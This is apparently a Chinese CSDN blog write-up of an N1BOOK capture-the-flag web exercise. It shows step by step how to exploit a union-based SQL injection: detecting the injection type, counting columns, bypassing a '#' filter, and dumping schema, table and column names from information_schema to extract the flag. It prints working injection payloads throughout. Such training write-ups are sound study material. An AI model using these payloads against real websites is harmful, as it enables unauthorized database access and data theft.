【N1BOOK】[第一章 web入门],sql注入1wp

本文详细描述了一次SQL注入攻击的过程,从?id=1a的异常响应揭示了类型转换规则,到通过注入点发现数据库有三列。利用‘union select’语法,逐步揭示了数据库的schema名、表名和字段名,并最终成功爆破出flag。文章深入探讨了SQL注入技术,包括#符号过滤、%23编码以及--+注释方式的绕过策略。
摘要由CSDN通过智能技术生成
  1. 先判断为字符型注入

?id = 2-1 无显示
?id=1a 返回正常

在mysql中,等号两边如果类型不一致,则会发生强制转换。
当字符型和数字型数据比较,字符型将被强制性转换为数字
字符串“1a” 被强制性转换为1。
  1. id后面输入1到3,返回正常,直到输入4,无回显,推测有三列

1’ order by 1,2,3%23

  1. 发现#被过滤,采用url对应编码%23
    或者
    用–+,也可以用作注释

  2. 继续查注入点

id=a’ union select 1,2,3%27

在这里插入图片描述

id=a’ union select 1,2,group_concat(schema_name) from information_schema.schemata%23

在这里插入图片描述
这里有个疑问为什么不能??
1,group_concat(schema_name) from information_schema.schemata,3%23

  • 找库名

  • 找表名
    ?id=a' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='note'%23

  • 找字段名
    ?id=a' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='fl4g'%23

  • 得到字段名fllllg后,继续爆破
    ?id=a' union select 1,2,group_concat(concat_ws(0x23,fllllag)) from note.fl4g%23

得到flag

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值